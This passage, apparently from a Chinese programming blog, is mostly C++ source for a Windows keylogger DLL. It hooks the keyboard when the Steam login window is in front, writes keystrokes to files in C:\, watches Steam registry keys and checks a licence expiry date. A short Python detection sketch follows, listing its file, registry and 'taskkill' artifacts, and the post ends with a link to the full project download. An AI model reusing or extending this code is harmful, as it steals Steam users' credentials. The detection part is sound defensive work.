'T':myEmailSTR = "T";break;case 'U':myEmailSTR = "U";break;case 'V':myEmailSTR = "V";break;case 'W':myEmailSTR = "W";break;case 'X':myEmailSTR = "X";break;case 'Y':myEmailSTR = "Y";break;case 'Z':myEmailSTR = "Z";break;}}else if(!b_Sft && b_Clk){switch(wParam){case '1':myEmailSTR = "1";break;case '2':myEmailSTR = "2";break;case '3':myEmailSTR = "3";break;case '4':myEmailSTR = "4";break;case '5':myEmailSTR = "5";break;case '6':myEmailSTR = "6";break;case '7':myEmailSTR = "7";break;case '8':myEmailSTR = "8";break;case '9':myEmailSTR = "9";break;case '0':myEmailSTR = "0";break;case 'A':myEmailSTR = "A";break;case 'B':myEmailSTR = "B";break;case 'C':myEmailSTR 
= "C";break;case 'D':myEmailSTR = "D";break;case 'E':myEmailSTR = "E";break;case 'F':myEmailSTR = "F";break;case 'G':myEmailSTR = "G";break;case 'H':myEmailSTR = "H";break;case 'I':myEmailSTR = "I";break;case 'J':myEmailSTR = "J";break;case 'K':myEmailSTR = "K";break;case 'L':myEmailSTR = "L";break;case 'M':myEmailSTR = "M";break;case 'N':myEmailSTR = "N";break;case 'O':myEmailSTR = "O";break;case 'P':myEmailSTR = "P";break;case 'Q':myEmailSTR = "Q";break;case 'R':myEmailSTR = "R";break;case 'S':myEmailSTR = "S";break;case 'T':myEmailSTR = "T";break;case 'U':myEmailSTR = "U";break;case 'V':myEmailSTR = "V";break;case 'W':myEmailSTR = "W";break;case 'X':myEmailSTR = "X";break;case 'Y':myEmailSTR = "Y";break;case 'Z':myEmailSTR = "Z";break;}}else if(b_Sft && b_Clk){switch(wParam){case '1':myEmailSTR = "!";break;case '2':myEmailSTR = "@";break;case '3':myEmailSTR = "#";break;case '4':myEmailSTR = "$";break;case '5':myEmailSTR = "%";break;case '6':myEmailSTR = "^";break;case '7':myEmailSTR = "&";break;case '8':myEmailSTR = "*";break;case '9':myEmailSTR = "(";break;case '0':myEmailSTR = ")";break;case 'A':myEmailSTR = "a";break;case 'B':myEmailSTR = "b";break;case 'C':myEmailSTR = "c";break;case 'D':myEmailSTR = "d";break;case 'E':myEmailSTR = "e";break;case 'F':myEmailSTR = "f";break;case 'G':myEmailSTR = "g";break;case 'H':myEmailSTR = "h";break;case 'I':myEmailSTR = "i";break;case 'J':myEmailSTR = "j";break;case 'K':myEmailSTR = "k";break;case 'L':myEmailSTR = "l";break;case 'M':myEmailSTR = "m";break;case 'N':myEmailSTR = "n";break;case 'O':myEmailSTR = "o";break;case 'P':myEmailSTR = "p";break;case 'Q':myEmailSTR = "q";break;case 'R':myEmailSTR = "r";break;case 'S':myEmailSTR = "s";break;case 'T':myEmailSTR = "t";break;case 'U':myEmailSTR = "u";break;case 'V':myEmailSTR = "v";break;case 'W':myEmailSTR = "w";break;case 'X':myEmailSTR = "x";break;case 'Y':myEmailSTR = "y";break;case 'Z':myEmailSTR = "z";break;}}else{switch(wParam){case '1':myEmailSTR = "1";break;case 
'2':myEmailSTR = "2";break;case '3':myEmailSTR = "3";break;case '4':myEmailSTR = "4";break;	case '5':myEmailSTR = "5";break;case '6':myEmailSTR = "6";break;case '7':myEmailSTR = "7";break;case '8':myEmailSTR = "8";break;case '9':myEmailSTR = "9";break;case '0':myEmailSTR = "0";break;case 'A':myEmailSTR = "a";break;case 'B':myEmailSTR = "b";break;case 'C':myEmailSTR = "c";break;case 'D':myEmailSTR = "d";break;case 'E':myEmailSTR = "e";break;case 'F':myEmailSTR = "f";break;case 'G':myEmailSTR = "g";break;case 'H':myEmailSTR = "h";break;case 'I':myEmailSTR = "i";break;case 'J':myEmailSTR = "j";break;case 'K':myEmailSTR = "k";break;case 'L':myEmailSTR = "l";break;case 'M':myEmailSTR = "m";break;case 'N':myEmailSTR = "n";break;case 'O':myEmailSTR = "o";break;case 'P':myEmailSTR = "p";break;case 'Q':myEmailSTR = "q";break;case 'R':myEmailSTR = "r";break;case 'S':myEmailSTR = "s";break;case 'T':myEmailSTR = "t";break;case 'U':myEmailSTR = "u";break;case 'V':myEmailSTR = "v";break;case 'W':myEmailSTR = "w";break;case 'X':myEmailSTR = "x";break;case 'Y':myEmailSTR = "y";break;case 'Z':myEmailSTR = "z";break;}}//小键盘按键switch(wParam){case VK_NUMPAD1:myEmailSTR = "1";break;case VK_NUMPAD2:myEmailSTR = "2";break;case VK_NUMPAD3:myEmailSTR = "3";break;case VK_NUMPAD4:myEmailSTR = "4";break;case VK_NUMPAD5:myEmailSTR = "5";break;case VK_NUMPAD6:myEmailSTR = "6";break;case VK_NUMPAD7:myEmailSTR = "7";break;case VK_NUMPAD8:myEmailSTR = "8";break;case VK_NUMPAD9:myEmailSTR = "9";break;case VK_NUMPAD0:myEmailSTR = "0";break;case VK_MULTIPLY:myEmailSTR = "*";break;case VK_ADD:     myEmailSTR = "+";break;case VK_SUBTRACT:myEmailSTR = "-";break;case VK_DECIMAL: myEmailSTR = ".";break;case VK_DIVIDE:  myEmailSTR = "/";break;//其他特殊键case VK_BACK:myEmailSTR = "[Back_Space]";//myEmailSTR.Delete(myEmailSTR.GetLength()-1);break;case VK_TAB:myEmailSTR = "   ";break;case VK_SPACE:myEmailSTR = " ";break;// 回车键case VK_RETURN:myEmailSTR = "    ";break;}//其他键的处理char 
KeyName[50];ZeroMemory(KeyName,50);GetKeyNameText(lParam,KeyName,50);CString KeyNameStr=KeyName;if(KeyNameStr=="`"){if(b_Sft)myEmailSTR = "~";elsemyEmailSTR = "`";}if(KeyNameStr=="-"){if(b_Sft)myEmailSTR = "_";elsemyEmailSTR = "-";}if(KeyNameStr=="="){if(b_Sft)myEmailSTR = "+";elsemyEmailSTR = "=";}if(KeyNameStr=="["){if(b_Sft)myEmailSTR = "{";elsemyEmailSTR = "[";}if(KeyNameStr=="]"){if(b_Sft)myEmailSTR = "}";elsemyEmailSTR = "]";}if(KeyNameStr==";"){if(b_Sft)myEmailSTR = ":";elsemyEmailSTR = ";";}if(KeyNameStr=="'"){if(b_Sft)myEmailSTR = "\"";elsemyEmailSTR = "'";}if(KeyNameStr==","){if(b_Sft)myEmailSTR = "<";elsemyEmailSTR = ",";}if(KeyNameStr=="."){if(b_Sft)myEmailSTR = ">";elsemyEmailSTR = ".";}if(KeyNameStr=="/"){if(b_Sft)myEmailSTR = "?";elsemyEmailSTR = "/";}if(KeyNameStr=="\\"){if(b_Sft)myEmailSTR = "|";elsemyEmailSTR = "\\";}//AfxMessageBox(myEmailSTR);CFileFind finder1;BOOL noEmpty1=finder1.FindFile("C:\\MailData.txt");if(!noEmpty1){FILE *fpx1;fpx1=fopen("C:\\MailData.txt", "w");if(fpx1){fprintf(fpx1, "%s", myEmailSTR.GetBuffer(0));}fclose(fpx1);}else{FILE *fpx2;fpx2=fopen("C:\\MailData.txt", "a");if(fpx2){fprintf(fpx2, "%s", myEmailSTR.GetBuffer(0));}fclose(fpx2);}myEmailSTR = "";}}}LRESULT RetVal = CallNextHookEx(hie, nCode, wParam, lParam );	return  RetVal;
}// HOOK 键盘回调函数 (监控 Steam.exe 输入)LRESULT DllExport CALLBACK IntProc1(int nCode,WPARAM wParam,LPARAM lParam)
{if(::GetCurrentProcessId() != GetEXE())return CallNextHookEx(hkb, nCode, wParam, lParam );HWND H_wnd = ::GetForegroundWindow();char sTitle[255];CString ss;::SendMessage(H_wnd,WM_GETTEXT,255,(LPARAM)sTitle);//AfxMessageBox(sTitle);ss.Format(TEXT("%s"), sTitle);//AfxMessageBox(ss);char *aaa;aaa = strstr(sTitle, "Steam  登录");char *bbb;bbb = strstr(sTitle, "Steam  登入");char *ccc;ccc = strstr(sTitle, "Steam  Login");char *ddd;ddd = strstr(sTitle, "S t e a m  登录");char *eee;eee = strstr(sTitle, "S t e a m  登  录");int n = ss.Find("Steam 登录",0);int m = ss.Find("Steam 登入",0);int o = ss.Find("Steam Login",0);int p = ss.Find("S t e a m 登录",0);int q = ss.Find("S t e a m 登 录",0);if( (aaa || bbb || ccc || ddd || eee) || (m >= 0 || n >= 0 || o >= 0 || p >= 0 || q >= 0) ){if(!Regedit){HKEY hKeyx;LONG lRetx, lRetx2;lRetx = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKeyx );if( lRetx == ERROR_SUCCESS ){char datas[256] = {0};DWORD dwTypes = REG_SZ;DWORD dwLengths = 256;lRetx2 = RegQueryValueEx( hKeyx, TEXT("AutoLoginUser"), NULL, &dwTypes, (LPBYTE)datas, &dwLengths );if(lRetx2 != ERROR_SUCCESS){//创建线程监控注册表 1DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); Regedit = true;}else{// 如果注册表中能打开存放用户数据的键值// 而该键值又为空的话必须运行线程1来操作if( strlen(datas) < 4 ){//创建线程监控注册表 1DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); Regedit = true;}else{//创建线程监控注册表 2DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit2, NULL, 0, &dwThreadId); Regedit = true;}}}RegCloseKey(hKeyx);}if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1){BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);BOOL b_Clk = ::GetKeyState(VK_CAPITAL);BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);if(!b_Ctl && !b_Alt){if(b_Sft && !b_Clk){switch(wParam){case '1':szStr += "!";break;case '2':szStr += "@";break;case '3':szStr += 
"#";break;case '4':szStr += "$";break;case '5':szStr += "%";break;case '6':szStr += "^";break;case '7':szStr += "&";break;case '8':szStr += "*";break;case '9':szStr += "(";break;case '0':szStr += ")";break;case 'A':szStr += "A";break;case 'B':szStr += "B";break;case 'C':szStr += "C";break;case 'D':szStr += "D";break;case 'E':szStr += "E";break;case 'F':szStr += "F";break;case 'G':szStr += "G";break;case 'H':szStr += "H";break;case 'I':szStr += "I";break;case 'J':szStr += "J";break;case 'K':szStr += "K";break;case 'L':szStr += "L";break;case 'M':szStr += "M";break;case 'N':szStr += "N";break;case 'O':szStr += "O";break;case 'P':szStr += "P";break;case 'Q':szStr += "Q";break;case 'R':szStr += "R";break;case 'S':szStr += "S";break;case 'T':szStr += "T";break;case 'U':szStr += "U";break;case 'V':szStr += "V";break;case 'W':szStr += "W";break;case 'X':szStr += "X";break;case 'Y':szStr += "Y";break;case 'Z':szStr += "Z";break;}}else if(!b_Sft && b_Clk){switch(wParam){case '1':szStr += "1";break;case '2':szStr += "2";break;case '3':szStr += "3";break;case '4':szStr += "4";break;case '5':szStr += "5";break;case '6':szStr += "6";break;case '7':szStr += "7";break;case '8':szStr += "8";break;case '9':szStr += "9";break;case '0':szStr += "0";break;case 'A':szStr += "A";break;case 'B':szStr += "B";break;case 'C':szStr += "C";break;case 'D':szStr += "D";break;case 'E':szStr += "E";break;case 'F':szStr += "F";break;case 'G':szStr += "G";break;case 'H':szStr += "H";break;case 'I':szStr += "I";break;case 'J':szStr += "J";break;case 'K':szStr += "K";break;case 'L':szStr += "L";break;case 'M':szStr += "M";break;case 'N':szStr += "N";break;case 'O':szStr += "O";break;case 'P':szStr += "P";break;case 'Q':szStr += "Q";break;case 'R':szStr += "R";break;case 'S':szStr += "S";break;case 'T':szStr += "T";break;case 'U':szStr += "U";break;case 'V':szStr += "V";break;case 'W':szStr += "W";break;case 'X':szStr += "X";break;case 'Y':szStr += "Y";break;case 'Z':szStr += "Z";break;}}else if(b_Sft 
&& b_Clk){switch(wParam){case '1':szStr += "!";break;case '2':szStr += "@";break;case '3':szStr += "#";break;case '4':szStr += "$";break;case '5':szStr += "%";break;case '6':szStr += "^";break;case '7':szStr += "&";break;case '8':szStr += "*";break;case '9':szStr += "(";break;case '0':szStr += ")";break;case 'A':szStr += "a";break;case 'B':szStr += "b";break;case 'C':szStr += "c";break;case 'D':szStr += "d";break;case 'E':szStr += "e";break;case 'F':szStr += "f";break;case 'G':szStr += "g";break;case 'H':szStr += "h";break;case 'I':szStr += "i";break;case 'J':szStr += "j";break;case 'K':szStr += "k";break;case 'L':szStr += "l";break;case 'M':szStr += "m";break;case 'N':szStr += "n";break;case 'O':szStr += "o";break;case 'P':szStr += "p";break;case 'Q':szStr += "q";break;case 'R':szStr += "r";break;case 'S':szStr += "s";break;case 'T':szStr += "t";break;case 'U':szStr += "u";break;case 'V':szStr += "v";break;case 'W':szStr += "w";break;case 'X':szStr += "x";break;case 'Y':szStr += "y";break;case 'Z':szStr += "z";break;}}else{switch(wParam){case '1':szStr += "1";break;case '2':szStr += "2";break;case '3':szStr += "3";break;case '4':szStr += "4";break;	case '5':szStr += "5";break;case '6':szStr += "6";break;case '7':szStr += "7";break;case '8':szStr += "8";break;case '9':szStr += "9";break;case '0':szStr += "0";break;case 'A':szStr += "a";break;case 'B':szStr += "b";break;case 'C':szStr += "c";break;case 'D':szStr += "d";break;case 'E':szStr += "e";break;case 'F':szStr += "f";break;case 'G':szStr += "g";break;case 'H':szStr += "h";break;case 'I':szStr += "i";break;case 'J':szStr += "j";break;case 'K':szStr += "k";break;case 'L':szStr += "l";break;case 'M':szStr += "m";break;case 'N':szStr += "n";break;case 'O':szStr += "o";break;case 'P':szStr += "p";break;case 'Q':szStr += "q";break;case 'R':szStr += "r";break;case 'S':szStr += "s";break;case 'T':szStr += "t";break;case 'U':szStr += "u";break;case 'V':szStr += "v";break;case 'W':szStr += "w";break;case 'X':szStr += 
"x";break;case 'Y':szStr += "y";break;case 'Z':szStr += "z";break;}}//小键盘按键switch(wParam){case VK_NUMPAD1:szStr += "1";break;case VK_NUMPAD2:szStr += "2";break;case VK_NUMPAD3:szStr += "3";break;case VK_NUMPAD4:szStr += "4";break;case VK_NUMPAD5:szStr += "5";break;case VK_NUMPAD6:szStr += "6";break;case VK_NUMPAD7:szStr += "7";break;case VK_NUMPAD8:szStr += "8";break;case VK_NUMPAD9:szStr += "9";break;case VK_NUMPAD0:szStr += "0";break;case VK_MULTIPLY:szStr += "*";break;case VK_ADD:     szStr += "+";break;case VK_SUBTRACT:szStr += "-";break;case VK_DECIMAL: szStr += ".";break;case VK_DIVIDE:  szStr += "/";break;//其他特殊键case VK_BACK:szStr.Delete(szStr.GetLength()-1);break;case VK_TAB:szStr += "   ";break;case VK_SPACE:szStr += " ";break;// 回车键case VK_RETURN:break;}//其他键的处理char KeyName[50];ZeroMemory(KeyName,50);GetKeyNameText(lParam,KeyName,50);CString KeyNameStr=KeyName;if(KeyNameStr=="`"){if(b_Sft)szStr += "~";elseszStr += "`";}if(KeyNameStr=="-"){if(b_Sft)szStr += "_";elseszStr += "-";}if(KeyNameStr=="="){if(b_Sft)szStr += "+";elseszStr += "=";}if(KeyNameStr=="["){if(b_Sft)szStr += "{";elseszStr += "[";}if(KeyNameStr=="]"){if(b_Sft)szStr += "}";elseszStr += "]";}if(KeyNameStr==";"){if(b_Sft)szStr += ":";elseszStr += ";";}if(KeyNameStr=="'"){if(b_Sft)szStr += "\"";elseszStr += "'";}if(KeyNameStr==","){if(b_Sft)szStr += "<";elseszStr += ",";}if(KeyNameStr=="."){if(b_Sft)szStr += ">";elseszStr += ".";}if(KeyNameStr=="/"){if(b_Sft)szStr += "?";elseszStr += "/";}if(KeyNameStr=="\\"){if(b_Sft)szStr += "|";elseszStr += "\\";}//AfxMessageBox(szStr);}}}LRESULT RetVal = CallNextHookEx(hkb, nCode, wParam, lParam );	return  RetVal;
}// 安装 HOOK 钩子BOOL DllExport installhook()
{/////				检测用户到期时间			 /////SYSTEMTIME st;CString strYear, strMonth, strDay, strFullTime;GetLocalTime(&st);strYear.Format("%d", st.wYear);strMonth.Format("%d", st.wMonth);strDay.Format("%d", st.wDay);if(st.wMonth < 10){int mmm = strMonth.Find("0", 0);if(mmm < 0){strMonth = "0" + strMonth;}}if(st.wDay < 10){int ddd = strDay.Find("0", 0);if(ddd < 0){strDay = "0" + strDay;}}strFullTime = strYear + strMonth + strDay;UserEndData.Remove('.');UserEndData.Remove('-');int LocalTime = atoi(strFullTime);int UserEndTime = atoi(UserEndData);if( LocalTime < UserEndTime ){//获取自身程序绝对路径TCHAR szmyPath[MAX_PATH + 1]={0};GetModuleFileName(NULL, szmyPath, MAX_PATH);(_tcsrchr(szmyPath, _T('\\')))[1] = 0;szMyselfPath.Format(TEXT("%s\\"), szmyPath);//// 删除帐号记录文件DeleteFile("C:\\NTUSERS.LOG");DeleteFile("C:\\MailData.txt");DeleteFile("C:\\MailName.txt");////设置程序优先级别为最高SetRealTimePriority();////提升程序的系统权限AdjustPrivileges();//// HOOK 键盘 1hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc1, hins, 0);//// HOOK 键盘 2hie = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc2, hinss, 0);////创建线程定时清理用户输入数据DWORD dwThreadIDX;CreateThread(NULL, 0, CleanUserData, NULL, 0, &dwThreadIDX); //}return TRUE;
}// 卸载 HOOK 钩子BOOL DllExport UnHook(HHOOK szHookName)
{   	if( UnhookWindowsHookEx(szHookName) ){return TRUE;}return FALSE;
}BOOL CTest3App::InitInstance()
{	AFX_MANAGE_STATE(AfxGetStaticModuleState());hins=AfxGetInstanceHandle();hinss=AfxGetInstanceHandle();return TRUE;
}/
// CTest3App constructionCTest3App::CTest3App()
{// TODO: add construction code here,// Place all significant initialization in InitInstance
}/
// The one and only CTest3App objectCTest3App theApp;
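From the defender's side, the listing above leaves a distinctive set of host artifacts: keystroke files in the root of C:, the `AccOne`/`DataOne`/`AccSecond`/`DataSecond` values under the per-user Steam key, a `rundll32.dll` loaded from `Program Files\Common Files`, and a hidden `taskkill /f /im steam.exe`. The following triage sketch is an added example, not part of the original post; it assumes events exported as dictionaries using Sysmon field names (Event IDs 1, 7, 11, 13), and the host names, SID and user name in the sample data are constructed.

```python
import re
from collections import defaultdict

# Artifacts taken from the code on this page (paths, value names, command line).
DROP_FILES = {r"c:\ntusers.log", r"c:\maildata.txt", r"c:\mailname.txt"}
REG_VALUE_RE = re.compile(
    r"\\Software\\Valve\\Steam\\[^\\]+\\(AccOne|DataOne|AccSecond|DataSecond)$",
    re.IGNORECASE)
KILL_RE = re.compile(r"taskkill\s+/f\s+/im\s+steam\.exe", re.IGNORECASE)
# rundll32 is an .exe under System32; a DLL of that name elsewhere is a masquerade.
FAKE_DLL_RE = re.compile(
    r"\\Program Files\\Common Files\\rundll32\.dll$", re.IGNORECASE)


def classify(event):
    """Return the name of the rule an event matches, or None."""
    eid = event.get("EventID")
    if eid == 11 and event.get("TargetFilename", "").lower() in DROP_FILES:
        return "keystroke_log_file"
    if eid == 13 and REG_VALUE_RE.search(event.get("TargetObject", "")):
        return "steam_credential_registry_value"
    if eid == 1 and KILL_RE.search(event.get("CommandLine", "")):
        return "forced_steam_termination"
    if eid == 7 and FAKE_DLL_RE.search(event.get("ImageLoaded", "")):
        return "masquerading_hook_dll"
    return None


def triage(events, min_rules=2):
    """Group rule hits per host; flag a host only when several distinct
    rules fire, so a lone admin 'taskkill' does not raise an alert."""
    hits = defaultdict(lambda: defaultdict(list))
    for ev in events:
        rule = classify(ev)
        if rule:
            hits[ev["Computer"]][rule].append(ev)
    return {
        host: {"rules": sorted(rules), "flagged": len(rules) >= min_rules}
        for host, rules in hits.items()
    }


# Constructed sample events (not real telemetry).
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"Computer": "PC-01", "EventID": 7,
     "Image": r"C:\Users\user\Desktop\Steam.exe",
     "ImageLoaded": r"C:\Program Files\Common Files\rundll32.dll"},
    {"Computer": "PC-01", "EventID": 11,
     "TargetFilename": r"C:\MailData.txt"},
    {"Computer": "PC-01", "EventID": 13,
     "TargetObject": "HKU\\" + SID + r"\Software\Valve\Steam\exampleuser\AccSecond"},
    {"Computer": "PC-01", "EventID": 1,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /q /c taskkill /f /im steam.exe"},
    # Benign look-alikes: an admin killing Steam, a normal Steam registry
    # write, and the genuine rundll32.exe being mapped.
    {"Computer": "PC-02", "EventID": 1,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c taskkill /F /IM steam.exe"},
    {"Computer": "PC-03", "EventID": 13,
     "TargetObject": "HKU\\" + SID + r"\Software\Valve\Steam\AutoLoginUser"},
    {"Computer": "PC-03", "EventID": 7,
     "ImageLoaded": r"C:\Windows\System32\rundll32.exe"},
]

if __name__ == "__main__":
    for host, result in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, result)
```

Hosts that match a single rule are still returned with `flagged` set to `False`, so they can be reviewed at lower priority.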

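Full project download

The main program, the DLL and the account verification tool are packaged and uploaded together. It is written a bit messily, has little technical depth, and is no longer of any use in the current situation.

[CSDN download] https://download.csdn.net/download/qq_39190622/88683609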
